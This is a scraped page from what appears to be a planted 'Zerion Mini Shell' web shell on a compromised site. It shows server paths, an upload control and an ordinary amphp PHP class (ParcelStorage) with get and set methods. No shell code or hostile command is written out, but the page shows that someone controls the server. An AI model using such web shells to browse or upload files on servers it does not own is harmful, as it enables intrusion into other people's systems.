ok

Mini Shell

Direktori : /home2/selectio/public_html/fms-worksuite/vendor/amphp/parallel/lib/Sync/Internal/
Upload File :
Current File : /home2/selectio/public_html/fms-worksuite/vendor/amphp/parallel/lib/Sync/Internal/ParcelStorage.php

<?php

namespace Amp\Parallel\Sync\Internal;

final class ParcelStorage extends \Threaded
{
    /** @var mixed */
    private $value;

    /**
     * @param mixed $value
     */
    public function __construct($value)
    {
        $this->value = $value;
    }

    /**
     * @return mixed
     */
    public function get()
    {
        return $this->value;
    }

    /**
     * @param mixed $value
     */
    public function set($value): void
    {
        $this->value = $value;
    }
}

Zerion Mini Shell 1.0